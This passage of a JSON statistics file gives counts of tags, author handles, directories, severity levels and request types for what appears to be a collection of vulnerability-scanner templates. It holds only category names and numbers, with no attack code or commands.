","count":1},{"name":"ems","count":1},{"name":"announcekit","count":1},{"name":"spip","count":1},{"name":"sourcebans","count":1},{"name":"wmt","count":1},{"name":"ewebs","count":1},{"name":"jenzabar","count":1},{"name":"memcached","count":1},{"name":"mysql","count":1},{"name":"lancom","count":1},{"name":"krweb","count":1},{"name":"blind","count":1},{"name":"xdcms","count":1},{"name":"arl","count":1},{"name":"wondercms","count":1},{"name":"webmin","count":1},{"name":"wildfly","count":1},{"name":"sar2html","count":1},{"name":"linksys","count":1},{"name":"iptime","count":1},{"name":"hortonworks","count":1},{"name":"perl","count":1},{"name":"exponentcms","count":1},{"name":"salesforce","count":1},{"name":"etouch","count":1},{"name":"zzzcms","count":1},{"name":"gitlist","count":1},{"name":"tileserver","count":1},{"name":"turbocrm","count":1},{"name":"smi","count":1},{"name":"setup","count":1},{"name":"acontent","count":1},{"name":"craftcms","count":1},{"name":"mediumish","count":1},{"name":"robomongo","count":1},{"name":"magicflow","count":1},{"name":"clink-office","count":1},{"name":"openrestry","count":1},{"name":"plone","count":1},{"name":"landrayoa","count":1},{"name":"cocoon","count":1},{"name":"solman","count":1},{"name":"apiman","count":1},{"name":"keenetic","count":1},{"name":"zenario","count":1},{"name":"k8","count":1},{"name":"jitsi","count":1},{"name":"javascript","count":1},{"name":"timeclock","count":1},{"name":"opentsdb","count":1},{"name":"portainer","count":1},{"name":"ns","count":1},{"name":"viewpoint","count":1},{"name":"rabbitmq","count":1},{"name":"webftp","count":1},{"name":"phalcon","count":1},{"name":"dom","count":1},{"name":"diris","count":1},{"name":"xml","count":1},{"name":"opm","count":1},{"name":"expressjs","count":1},{"name":"biometrics","count":1},{"name":"ssltls","count":1},{"name":"sitecore","count":1},{"name":"upnp","count":1},{"name":"zeroshell","count":1},{"name":"kerbynet","count":1},{"name":"jeewms","count":1},{"name":"influxdb","count":1},{"name":"wuzhicms","count":1},{"name":"selea","count":1},{"name":"enumeration","count":1},{"name":"nexusdb","count":1},{"name":"comodo","count":1},{"name":"concrete","count":1},{"name":"visualtools","count":1},{"name":"auth","count":1},{"name":"mautic","count":1},{"name":"woocomernce","count":1},{"name":"nuuo","count":1},{"name":"cyberoam","count":1},{"name":"email","count":1},{"name":"sco","count":1},{"name":"anchorcms","count":1},{"name":"st","count":1},{"name":"erp-nc","count":1},{"name":"redis","count":1},{"name":" default-login","count":1},{"name":"dvr","count":1},{"name":"zyxel","count":1},{"name":"octobercms","count":1},{"name":"favicon","count":1},{"name":"owa","count":1},{"name":"spring","count":1},{"name":"tectuus","count":1},{"name":"checkpoint","count":1},{"name":"redhat","count":1},{"name":"bolt","count":1},{"name":"cherokee","count":1},{"name":"zend","count":1},{"name":"vsftpd","count":1},{"name":"klog","count":1},{"name":"nedi","count":1},{"name":"timesheet","count":1},{"name":"plc","count":1},{"name":"nweb2fax","count":1},{"name":"camera","count":1},{"name":"maccmsv10","count":1},{"name":"fastcgi","count":1},{"name":"crm","count":1},{"name":"sophos","count":1},{"name":"bash","count":1},{"name":"nc2","count":1},{"name":"clockwatch","count":1},{"name":"viewlinc","count":1},{"name":"yealink","count":1},{"name":"labtech","count":1},{"name":"zte","count":1},{"name":"ruby","count":1},{"name":"sarg","count":1},{"name":"floc","count":1},{"name":"fuelcms","count":1},{"name":"pyramid","count":1},{"name":"cobub","count":1},{"name":"wavemaker","count":1},{"name":"2014","count":1},{"name":"cerebro","count":1},{"name":"scimono","count":1},{"name":"cgi","count":1},{"name":"netmask","count":1},{"name":"dotnetnuke","count":1},{"name":"interlib","count":1},{"name":"apos","count":1},{"name":"mongo","count":1},{"name":"circontrorl","count":1},{"name":"rdp","count":1},{"name":"liferay","count":1},{"name":"fortigate","count":1},{"name":"traefik","count":1},{"name":"twitter-server","count":1},{"name":"shopware","count":1},{"name":"majordomo2","count":1},{"name":"zcms","count":1},{"name":"meraki","count":1},{"name":"feifeicms","count":1},{"name":"mantisbt","count":1},{"name":"openemr","count":1},{"name":"geutebruck","count":1},{"name":"mara","count":1},{"name":"xff","count":1},{"name":"doh","count":1},{"name":"idemia","count":1},{"name":"realteo","count":1},{"name":"fortinet","count":1},{"name":"episerver","count":1},{"name":"sprintful","count":1},{"name":"esmtp","count":1},{"name":"linux","count":1},{"name":"zookeeper","count":1},{"name":"bruteforce","count":1},{"name":"whm","count":1},{"name":"drone","count":1},{"name":"enum","count":1},{"name":"netrc","count":1},{"name":"glances","count":1},{"name":"javafaces","count":1},{"name":"zm","count":1},{"name":"mdb","count":1},{"name":"calendarix","count":1},{"name":"tensorboard","count":1},{"name":"finereport","count":1},{"name":"cofax","count":1},{"name":"couchbase","count":1},{"name":"dompdf","count":1},{"name":"phpunit","count":1},{"name":"seacms","count":1},{"name":"gloo","count":1},{"name":"bookstack","count":1},{"name":"rhymix","count":1},{"name":"rujjie","count":1},{"name":"dotclear","count":1},{"name":"gotmls","count":1},{"name":"mongoshake","count":1},{"name":"vsphere","count":1},{"name":"powercreator","count":1},{"name":"froxlor","count":1},{"name":"tenda","count":1},{"name":"lg-nas","count":1},{"name":"opensns","count":1},{"name":"pulsesecure","count":1},{"name":"flink","count":1},{"name":"cloudinary","count":1},{"name":"rubedo","count":1},{"name":"xmlchart","count":1},{"name":"postmessage","count":1},{"name":"weiphp","count":1},{"name":"sqlite","count":1},{"name":"codemeter","count":1},{"name":"vscode","count":1},{"name":"exposures","count":1},{"name":"visionhub","count":1},{"name":"h3c-imc","count":1},{"name":"oscommerce","count":1},{"name":"varnish","count":1},{"name":"nette","count":1},{"name":"thinkadmin","count":1},{"name":"htmli","count":1},{"name":"74cms","count":1},{"name":"darkstat","count":1},{"name":"ulterius","count":1},{"name":"spf","count":1},{"name":"mariadb","count":1},{"name":"gateone","count":1},{"name":"yii","count":1},{"name":"mailchimp","count":1},{"name":"clusterengine","count":1},{"name":"fiori","count":1},{"name":"szhe","count":1},{"name":"node-red-dashboard","count":1},{"name":"fortilogger","count":1},{"name":"alerta","count":1},{"name":"domxss","count":1},{"name":"spectracom","count":1},{"name":"oneblog","count":1},{"name":"shopxo","count":1},{"name":"nomad","count":1},{"name":"api-manager","count":1},{"name":"plugin","count":1},{"name":"manageengine","count":1},{"name":"acme","count":1},{"name":"cloudflare","count":1},{"name":"asus","count":1},{"name":"elascticsearch","count":1},{"name":"phpfastcache","count":1},{"name":"redcap","count":1},{"name":"accela","count":1},{"name":"sureline","count":1}],"authors":[{"name":"dhiyaneshdk","count":248},{"name":"pikpikcu","count":246},{"name":"pdteam","count":198},{"name":"daffainfo","count":183},{"name":"geeknik","count":150},{"name":"dwisiswant0","count":132},{"name":"gy741","count":72},{"name":"madrobot","count":62},{"name":"pussycat0x","count":55},{"name":"princechaddha","count":55},{"name":"gaurang","count":42},{"name":"ice3man","count":26},{"name":"0x_akoko","count":25},{"name":"organiccrap","count":24},{"name":"philippedelteil","count":21},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"nadino","count":9},{"name":"wdahlenb","count":9},{"name":"melbadry9","count":9},{"name":"hackergautam","count":9},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"oppsec","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"dogasantos","count":7},{"name":"dr_set","count":7},{"name":"techryptic (@tech)","count":7},{"name":"puzzlepeaches","count":6},{"name":"logicalhunter","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"meme-lord","count":6},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"pentest_swissky","count":5},{"name":"ganofins","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"nodauf","count":4},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"xelkomy","count":4},{"name":"0w4ys","count":3},{"name":"thomas_from_offensity","count":3},{"name":"impramodsargar","count":3},{"name":"z3bd","count":3},{"name":"lu4nx","count":3},{"name":"jarijaas","count":3},{"name":"dudez","count":3},{"name":"f1tz","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"incogbyte","count":3},{"name":"_generic_human_","count":3},{"name":"vsh00t","count":3},{"name":"tess","count":3},{"name":"binaryfigments","count":3},{"name":"shine","count":3},{"name":"emenalf","count":3},{"name":"fyoorer","count":3},{"name":"hahwul","count":2},{"name":"random-robbie","count":2},{"name":"w4cky_","count":2},{"name":"gevakun","count":2},{"name":"r3naissance","count":2},{"name":"kiblyn11","count":2},{"name":"udit_thakkur","count":2},{"name":"pxmme1337","count":2},{"name":"unstabl3","count":2},{"name":"bp0lr","count":2},{"name":"foulenzer","count":2},{"name":"joeldeleep","count":2},{"name":"manas_harsh","count":2},{"name":"vavkamil","count":2},{"name":"socketz","count":2},{"name":"davidmckennirey","count":2},{"name":"amsda","count":2},{"name":"bing0o","count":2},{"name":"moritz nentwig","count":2},{"name":"parth","count":2},{"name":"g4l1t0","count":2},{"name":"ree4pwn","count":2},{"name":"whoever","count":2},{"name":"nkxxkn","count":2},{"name":"0xelkomy","count":2},{"name":"hetroublemakr","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"arcc","count":2},{"name":"bsysop","count":2},{"name":"0xsapra","count":2},{"name":"x1m_martijn","count":2},{"name":"lotusdll","count":2},{"name":"fabaff","count":2},{"name":"koti2","count":2},{"name":"dheerajmadhukar","count":2},{"name":"huowuzhao","count":2},{"name":"0xcrypto","count":2},{"name":"swissky","count":2},{"name":"convisoappsec","count":2},{"name":"zomsop82","count":2},{"name":"gal nagli","count":2},{"name":"ehsahil","count":2},{"name":"cocxanh","count":2},{"name":"afaq","count":2},{"name":"sushantkamble","count":2},{"name":"johnjhacking","count":2},{"name":"alifathi-h1","count":2},{"name":"mohammedsaneem","count":2},{"name":"0xrudra","count":2},{"name":"0xprial","count":2},{"name":"randomrobbie","count":2},{"name":"c3l3si4n","count":1},{"name":"rtcms","count":1},{"name":"hakluke","count":1},{"name":"un-fmunozs","count":1},{"name":"skeltavik","count":1},{"name":"52971","count":1},{"name":"_darrenmartyn","count":1},{"name":"zandros0","count":1},{"name":"hanlaomo","count":1},{"name":"patralos","count":1},{"name":"revblock","count":1},{"name":"0xtavian","count":1},{"name":"rodnt","count":1},{"name":"abison_binoy","count":1},{"name":"s1r1u5_","count":1},{"name":"izn0u","count":1},{"name":"makyotox","count":1},{"name":"dawid-czarnecki","count":1},{"name":"borna nematzadeh","count":1},{"name":"sy3omda","count":1},{"name":"flag007","count":1},{"name":"pratik khalane","count":1},{"name":"j33n1k4","count":1},{"name":"mhdsamx","count":1},{"name":"cookiehanhoan","count":1},{"name":"johnk3r","count":1},{"name":"yavolo","count":1},{"name":"yashanand155","count":1},{"name":"elder tao","count":1},{"name":"vzamanillo","count":1},{"name":"nytr0gen","count":1},{"name":"elmahdi","count":1},{"name":"shreyapohekar","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"0h1in9e","count":1},{"name":"ooooooo_q","count":1},{"name":"ldionmarcil","count":1},{"name":"becivells","count":1},{"name":"sec_hawk","count":1},{"name":"iampritam","count":1},{"name":"apt-mirror","count":1},{"name":"alex","count":1},{"name":"soyelmago","count":1},{"name":"fmunozs","count":1},{"name":"adrianmf","count":1},{"name":"mah3sec_","count":1},{"name":"juicypotato1","count":1},{"name":"undefl0w","count":1},{"name":"ajaysenr","count":1},{"name":"willd96","count":1},{"name":"qlkwej","count":1},{"name":"daviey","count":1},{"name":"0xrod","count":1},{"name":"omarkurt","count":1},{"name":"pdp","count":1},{"name":"evolutionsec","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"zhenwarx","count":1},{"name":"philippdelteil","count":1},{"name":"regala_","count":1},{"name":"0xteles","count":1},{"name":"bjhulst","count":1},{"name":"wabafet","count":1},{"name":"b0yd","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"affix","count":1},{"name":"schniggie","count":1},{"name":"intx0x80","count":1},{"name":"naglinagli","count":1},{"name":"sickwell","count":1},{"name":"bernardofsr","count":1},{"name":"knassar702","count":1},{"name":"kareemse1im","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"kabirsuda","count":1},{"name":"shelld3v","count":1},{"name":"divya_mudgal","count":1},{"name":"geraldino2","count":1},{"name":"gboddin","count":1},{"name":"petruknisme","count":1},{"name":"aresx","count":1},{"name":"deena","count":1},{"name":"akshansh","count":1},{"name":"retr0","count":1},{"name":"b4uh0lz","count":1},{"name":"tim_koopmans","count":1},{"name":"luskabol","count":1},{"name":"0ut0fb4nd","count":1},{"name":"@dwisiswant0","count":1},{"name":"rojanrijal","count":1},{"name":"exploitation","count":1},{"name":"blckraven","count":1},{"name":"_c0wb0y_","count":1},{"name":"berkdusunur","count":1},{"name":"andirrahmani1","count":1},{"name":"thevillagehacker","count":1},{"name":"jteles","count":1},{"name":"taielab","count":1},{"name":"ohlinge","count":1},{"name":"sicksec","count":1},{"name":"mass0ma","count":1},{"name":"pudsec","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"yashgoti","count":1},{"name":"b0rn2r00t","count":1},{"name":"streetofhackerr007","count":1},{"name":"mubassirpatel","count":1},{"name":"absshax","count":1},{"name":"bad5ect0r","count":1},{"name":"its0x08","count":1},{"name":"whynotke","count":1},{"name":"noamrathaus","count":1},{"name":"th3.d1p4k","count":1},{"name":"chron0x","count":1},{"name":"ipanda","count":1},{"name":"_harleo","count":1},{"name":"ahmed sherif","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"kre80r","count":1},{"name":"udyz","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"infosecsanyam","count":1},{"name":"alph4byt3","count":1},{"name":"sullo","count":1},{"name":"x6263","count":1},{"name":"andysvints","count":1},{"name":"remonsec","count":1},{"name":"co0nan","count":1},{"name":"manuelbua","count":1},{"name":"toufik airane","count":1},{"name":"defr0ggy","count":1},{"name":"mesaglio","count":1},{"name":"d0rkerdevil","count":1},{"name":"furkansenan","count":1},{"name":"ringo","count":1},{"name":"idealphase","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sshell","count":1},{"name":"fopina","count":1},{"name":"tirtha_mandal","count":1},{"name":"akash.c","count":1},{"name":"kurohost","count":1},{"name":"smaranchand","count":1},{"name":"thezakman","count":1},{"name":"notsoevilweasel","count":1},{"name":"luci","count":1},{"name":"jeya seelan","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"raesene","count":1},{"name":"me9187","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"alperenkesk","count":1},{"name":"micha3lb3n","count":1},{"name":"bolli95","count":1},{"name":"shifacyclewla","count":1},{"name":"ilovebinbash","count":1}],"directory":[{"name":"cves","count":674},{"name":"vulnerabilities","count":284},{"name":"exposed-panels","count":235},{"name":"exposures","count":186},{"name":"technologies","count":170},{"name":"misconfiguration","count":129},{"name":"takeovers","count":71},{"name":"default-logins","count":54},{"name":"file","count":46},{"name":"workflows","count":35},{"name":"network","count":30},{"name":"miscellaneous","count":24},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"fuzzing","count":9},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":615},{"name":"high","count":535},{"name":"medium","count":413},{"name":"critical","count":236},{"name":"low","count":161}],"types":[{"name":"http","count":1859},{"name":"file","count":46},{"name":"network","count":39},{"name":"dns","count":11}]} +{"tags":[{"name":"cve","count":690},{"name":"lfi","count":250},{"name":"panel","count":248},{"name":"xss","count":227},{"name":"exposure","count":226},{"name":"wordpress","count":207},{"name":"rce","count":195},{"name":"tech","count":169},{"name":"cve2020","count":160},{"name":"wp-plugin","count":140},{"name":"cve2021","count":115},{"name":"cve2019","count":93},{"name":"config","count":93},{"name":"cve2018","count":82},{"name":"joomla","count":74},{"name":"apache","count":68},{"name":"takeover","count":66},{"name":"token","count":65},{"name":"cve2010","count":64},{"name":"default-login","count":63},{"name":"iot","count":62},{"name":"oob","count":51},{"name":"cve2017","count":49},{"name":"file","count":46},{"name":"unauth","count":45},{"name":"network","count":41},{"name":"sqli","count":38},{"name":"","count":36},{"name":"oracle","count":36},{"name":"ssrf","count":35},{"name":"cve2016","count":32},{"name":"logs","count":30},{"name":"redirect","count":30},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":25},{"name":"misc","count":23},{"name":"cve2015","count":21},{"name":"disclosure","count":21},{"name":"generic","count":20},{"name":"auth-bypass","count":20},{"name":"cisco","count":19},{"name":"aem","count":19},{"name":"router","count":19},{"name":"sap","count":18},{"name":"springboot","count":17},{"name":"debug","count":16},{"name":"cve2014","count":15},{"name":"misconfig","count":15},{"name":"cve2012","count":14},{"name":"cve2011","count":14},{"name":"weblogic","count":14},{"name":"login","count":14},{"name":"android","count":13},{"name":"adobe","count":13},{"name":"struts","count":13},{"name":"fuzz","count":13},{"name":"devops","count":13},{"name":"php","count":13},{"name":"dlink","count":12},{"name":"dns","count":12},{"name":"jenkins","count":12},{"name":"cve2013","count":11},{"name":"zoho","count":11},{"name":"dell","count":10},{"name":"aws","count":10},{"name":"xxe","count":9},{"name":"ftp","count":9},{"name":"magento","count":9},{"name":"airflow","count":8},{"name":"intrusive","count":8},{"name":"rails","count":8},{"name":"scada","count":8},{"name":"gitlab","count":8},{"name":"nginx","count":8},{"name":"cnvd","count":8},{"name":"ruijie","count":8},{"name":"backup","count":7},{"name":"netgear","count":7},{"name":"coldfusion","count":7},{"name":"files","count":7},{"name":"kubernetes","count":7},{"name":"cve2009","count":7},{"name":"cms","count":7},{"name":"google","count":7},{"name":"confluence","count":7},{"name":"vmware","count":7},{"name":"ibm","count":7},{"name":"laravel","count":6},{"name":"cve2008","count":6},{"name":"docker","count":6},{"name":"api","count":6},{"name":"django","count":6},{"name":"solr","count":6},{"name":"citrix","count":6},{"name":"rconfig","count":6},{"name":"jetty","count":6},{"name":"circarlife","count":5},{"name":"jolokia","count":5},{"name":"wp-theme","count":5},{"name":"headless","count":5},{"name":"windows","count":5},{"name":"microsoft","count":5},{"name":"dedecms","count":5},{"name":"ssti","count":5},{"name":"phpmyadmin","count":5},{"name":"tomcat","count":5},{"name":"deserialization","count":5},{"name":"iis","count":5},{"name":"fileupload","count":5},{"name":"drupal","count":5},{"name":"nodejs","count":5},{"name":"lucee","count":5},{"name":"printer","count":5},{"name":"java","count":5},{"name":"wso2","count":4},{"name":"webserver","count":4},{"name":"thinkcmf","count":4},{"name":"traversal","count":4},{"name":"exchange","count":4},{"name":"grafana","count":4},{"name":"samsung","count":4},{"name":"hongdian","count":4},{"name":"resin","count":4},{"name":"crlf","count":4},{"name":"thinkphp","count":4},{"name":"strapi","count":4},{"name":"magmi","count":4},{"name":"proxy","count":4},{"name":"vpn","count":4},{"name":"firmware","count":4},{"name":"artifactory","count":4},{"name":"symantec","count":4},{"name":"glpi","count":4},{"name":"solarwinds","count":4},{"name":"zimbra","count":4},{"name":"buffalo","count":4},{"name":"elastic","count":4},{"name":"symfony","count":4},{"name":"asp","count":4},{"name":"hp","count":4},{"name":"moodle","count":4},{"name":"openssh","count":3},{"name":"fanruan","count":3},{"name":"httpd","count":3},{"name":"tikiwiki","count":3},{"name":"bypass","count":3},{"name":"springcloud","count":3},{"name":"nacos","count":3},{"name":"prometheus","count":3},{"name":"bigip","count":3},{"name":"ebs","count":3},{"name":"ssh","count":3},{"name":"backups","count":3},{"name":"firebase","count":3},{"name":"fpd","count":3},{"name":"cacti","count":3},{"name":"nosqli","count":3},{"name":"terramaster","count":3},{"name":"caucho","count":3},{"name":"ofbiz","count":3},{"name":"slack","count":3},{"name":"oa","count":3},{"name":"nexus","count":3},{"name":"kafka","count":3},{"name":"amazon","count":3},{"name":"log","count":3},{"name":"mail","count":3},{"name":"openam","count":3},{"name":"zabbix","count":3},{"name":"camera","count":3},{"name":"vbulletin","count":3},{"name":"jellyfin","count":3},{"name":"r-seenet","count":3},{"name":"kibana","count":3},{"name":"git","count":3},{"name":"npm","count":3},{"name":"kevinlab","count":3},{"name":"microstrategy","count":3},{"name":"druid","count":3},{"name":"bitrix","count":3},{"name":"injection","count":3},{"name":"targa","count":3},{"name":"lfr","count":3},{"name":"telerik","count":3},{"name":"itop","count":3},{"name":"linkerd","count":3},{"name":"mongodb","count":3},{"name":"zhiyuan","count":3},{"name":"smtp","count":3},{"name":"opensis","count":3},{"name":"openfire","count":2},{"name":"cache","count":2},{"name":"axis","count":2},{"name":"oauth","count":2},{"name":"shellshock","count":2},{"name":"mcafee","count":2},{"name":"mida","count":2},{"name":"maian","count":2},{"name":"emerge","count":2},{"name":"prestashop","count":2},{"name":"ucmdb","count":2},{"name":"nextjs","count":2},{"name":"cve2005","count":2},{"name":"splunk","count":2},{"name":"ec2","count":2},{"name":"activemq","count":2},{"name":"db","count":2},{"name":"hoteldruid","count":2},{"name":"jsf","count":2},{"name":"xxljob","count":2},{"name":"seeyon","count":2},{"name":"frp","count":2},{"name":"showdoc","count":2},{"name":"hostheader-injection","count":2},{"name":"dolibarr","count":2},{"name":"glassfish","count":2},{"name":"hasura","count":2},{"name":"horde","count":2},{"name":"bucket","count":2},{"name":"icewarp","count":2},{"name":"ecology","count":2},{"name":"wordfence","count":2},{"name":"storage","count":2},{"name":"status","count":2},{"name":"akkadian","count":2},{"name":"netis","count":2},{"name":"backdoor","count":2},{"name":"kentico","count":2},{"name":"yii","count":2},{"name":"webcam","count":2},{"name":"voipmonitor","count":2},{"name":"geowebserver","count":2},{"name":"idrac","count":2},{"name":"keycloak","count":2},{"name":"natshell","count":2},{"name":"pega","count":2},{"name":"sharepoint","count":2},{"name":"spark","count":2},{"name":"harbor","count":2},{"name":"totemomail","count":2},{"name":"phpcollab","count":2},{"name":"sonicwall","count":2},{"name":"avantfax","count":2},{"name":"netsweeper","count":2},{"name":"fortios","count":2},{"name":"service","count":2},{"name":"odoo","count":2},{"name":"rockethchat","count":2},{"name":"favicon","count":2},{"name":"igs","count":2},{"name":"leak","count":2},{"name":"jeedom","count":2},{"name":"nagios","count":2},{"name":"ilo","count":2},{"name":"adminer","count":2},{"name":"prtg","count":2},{"name":"dos","count":2},{"name":"saltstack","count":2},{"name":"rockmongo","count":2},{"name":"middleware","count":2},{"name":"rstudio","count":2},{"name":"yapi","count":2},{"name":"akamai","count":2},{"name":"axis2","count":2},{"name":"bruteforce","count":2},{"name":"sonarqube","count":2},{"name":"hpe","count":2},{"name":"hashicorp","count":2},{"name":"chamilo","count":2},{"name":"guacamole","count":2},{"name":"smb","count":2},{"name":"plesk","count":2},{"name":"waf","count":2},{"name":"jboss","count":2},{"name":"huawei","count":2},{"name":"hjtcloud","count":2},{"name":"github","count":2},{"name":"node","count":2},{"name":"paloalto","count":2},{"name":"azure","count":2},{"name":"kong","count":2},{"name":"liferay","count":2},{"name":"grav","count":2},{"name":"chiyu","count":2},{"name":"couchdb","count":2},{"name":"vrealize","count":2},{"name":"flir","count":2},{"name":"cve2007","count":2},{"name":"globalprotect","count":2},{"name":"trixbox","count":2},{"name":"nextcloud","count":2},{"name":"beanshell","count":1},{"name":"wondercms","count":1},{"name":"tor","count":1},{"name":"sar2html","count":1},{"name":"erp-nc","count":1},{"name":"uwsgi","count":1},{"name":"swagger","count":1},{"name":"wmt","count":1},{"name":"yealink","count":1},{"name":"plastic","count":1},{"name":"announcekit","count":1},{"name":"gsoap","count":1},{"name":"hiboss","count":1},{"name":"jfrog","count":1},{"name":"phpwiki","count":1},{"name":"aura","count":1},{"name":"openrestry","count":1},{"name":"gstorage","count":1},{"name":"mailchimp","count":1},{"name":"h3c-imc","count":1},{"name":"visualtools","count":1},{"name":"realteo","count":1},{"name":"solman","count":1},{"name":"vsftpd","count":1},{"name":"api-manager","count":1},{"name":"pacsone","count":1},{"name":"razor","count":1},{"name":"opencast","count":1},{"name":"landrayoa","count":1},{"name":"cve2006","count":1},{"name":"traefik","count":1},{"name":"graphql","count":1},{"name":"maccmsv10","count":1},{"name":"upload","count":1},{"name":"clink-office","count":1},{"name":"owa","count":1},{"name":"bolt","count":1},{"name":"sureline","count":1},{"name":"checkpoint","count":1},{"name":"dotnet","count":1},{"name":"bedita","count":1},{"name":"fortigate","count":1},{"name":"eyou","count":1},{"name":"mysql","count":1},{"name":"frontpage","count":1},{"name":"varnish","count":1},{"name":"sitecore","count":1},{"name":"auth","count":1},{"name":"gogs","count":1},{"name":"hiawatha","count":1},{"name":"mpsec","count":1},{"name":"bash","count":1},{"name":"actuator","count":1},{"name":"resourcespace","count":1},{"name":"visionhub","count":1},{"name":"pgadmin","count":1},{"name":"wifisky","count":1},{"name":"exposures","count":1},{"name":"ambari","count":1},{"name":"keenetic","count":1},{"name":"logontracer","count":1},{"name":"xml","count":1},{"name":"avalanche","count":1},{"name":"sceditor","count":1},{"name":"starttls","count":1},{"name":"terraform","count":1},{"name":"nuxeo","count":1},{"name":"lansweeper","count":1},{"name":"spf","count":1},{"name":"episerver","count":1},{"name":"adb","count":1},{"name":"jquery","count":1},{"name":"bazarr","count":1},{"name":"scimono","count":1},{"name":"cves2016","count":1},{"name":"twitter-server","count":1},{"name":"esmtp","count":1},{"name":"bitly","count":1},{"name":"zookeeper","count":1},{"name":"zeroshell","count":1},{"name":"ems","count":1},{"name":"timeclock","count":1},{"name":"spip","count":1},{"name":"moin","count":1},{"name":"codeigniter","count":1},{"name":"doh","count":1},{"name":"wazuh","count":1},{"name":"alerta","count":1},{"name":"simplecrm","count":1},{"name":"karel","count":1},{"name":"synnefo","count":1},{"name":"couchbase","count":1},{"name":"socomec","count":1},{"name":"sco","count":1},{"name":"stem","count":1},{"name":"mdb","count":1},{"name":"livezilla","count":1},{"name":"micrsoft","count":1},{"name":"chyrp","count":1},{"name":"zm","count":1},{"name":"pmb","count":1},{"name":"74cms","count":1},{"name":"accela","count":1},{"name":"b2evolution","count":1},{"name":"ioncube","count":1},{"name":"lotus","count":1},{"name":"postmessage","count":1},{"name":"acexy","count":1},{"name":"phpfusion","count":1},{"name":"cgi","count":1},{"name":"feifeicms","count":1},{"name":"rmi","count":1},{"name":"javafaces","count":1},{"name":"metabase","count":1},{"name":"xunchi","count":1},{"name":"htmli","count":1},{"name":"vscode","count":1},{"name":"openerp","count":1},{"name":"openx","count":1},{"name":"mantisbt","count":1},{"name":"zenario","count":1},{"name":"clave","count":1},{"name":" default-login","count":1},{"name":"ssltls","count":1},{"name":"opentsdb","count":1},{"name":"sophos","count":1},{"name":"zarafa","count":1},{"name":"ntopng","count":1},{"name":"sidekiq","count":1},{"name":"elascticsearch","count":1},{"name":"mirai","count":1},{"name":"2014","count":1},{"name":"redis","count":1},{"name":"pippoint","count":1},{"name":"pagespeed","count":1},{"name":"lutron","count":1},{"name":"nette","count":1},{"name":"glances","count":1},{"name":"expose","count":1},{"name":"ewebs","count":1},{"name":"flash","count":1},{"name":"meraki","count":1},{"name":"k8s","count":1},{"name":"redwood","count":1},{"name":"asus","count":1},{"name":"csod","count":1},{"name":"viewpoint","count":1},{"name":"shopware","count":1},{"name":"tapestry","count":1},{"name":"avtech","count":1},{"name":"opensns","count":1},{"name":"appweb","count":1},{"name":"camunda","count":1},{"name":"enum","count":1},{"name":"nc2","count":1},{"name":"qsan","count":1},{"name":"sprintful","count":1},{"name":"upnp","count":1},{"name":"s3","count":1},{"name":"oneblog","count":1},{"name":"graphite","count":1},{"name":"kyan","count":1},{"name":"javascript","count":1},{"name":"ssl","count":1},{"name":"nomad","count":1},{"name":"vsphere","count":1},{"name":"bullwark","count":1},{"name":"dvr","count":1},{"name":"dotnetnuke","count":1},{"name":"huijietong","count":1},{"name":"blind","count":1},{"name":"nexusdb","count":1},{"name":"shoppable","count":1},{"name":"netdata","count":1},{"name":"wiki","count":1},{"name":"webmin","count":1},{"name":"embedthis","count":1},{"name":"addpac","count":1},{"name":"javamelody","count":1},{"name":"perl","count":1},{"name":"selea","count":1},{"name":"node-red-dashboard","count":1},{"name":"nedi","count":1},{"name":"yachtcontrol","count":1},{"name":"memcached","count":1},{"name":"centreon","count":1},{"name":"fastcgi","count":1},{"name":"cofax","count":1},{"name":"circontrol","count":1},{"name":"spectracom","count":1},{"name":"faraday","count":1},{"name":"dnssec","count":1},{"name":"acme","count":1},{"name":"blackboard","count":1},{"name":"minio","count":1},{"name":"froxlor","count":1},{"name":"ghost","count":1},{"name":"darkstat","count":1},{"name":"jmx","count":1},{"name":"turbocrm","count":1},{"name":"xmlchart","count":1},{"name":"geutebruck","count":1},{"name":"eprints","count":1},{"name":"comodo","count":1},{"name":"zzzcms","count":1},{"name":"rsyncd","count":1},{"name":"servicedesk","count":1},{"name":"basic-auth","count":1},{"name":"kafdrop","count":1},{"name":"qcubed","count":1},{"name":"mara","count":1},{"name":"kubeflow","count":1},{"name":"monitorix","count":1},{"name":"jaspersoft","count":1},{"name":"jenzabar","count":1},{"name":"tjws","count":1},{"name":"openemr","count":1},{"name":"zyxel","count":1},{"name":"minimouse","count":1},{"name":"goahead","count":1},{"name":"tensorboard","count":1},{"name":"phpfastcache","count":1},{"name":"clusterengine","count":1},{"name":"qdpm","count":1},{"name":"dompdf","count":1},{"name":"influxdb","count":1},{"name":"skywalking","count":1},{"name":"office365","count":1},{"name":"li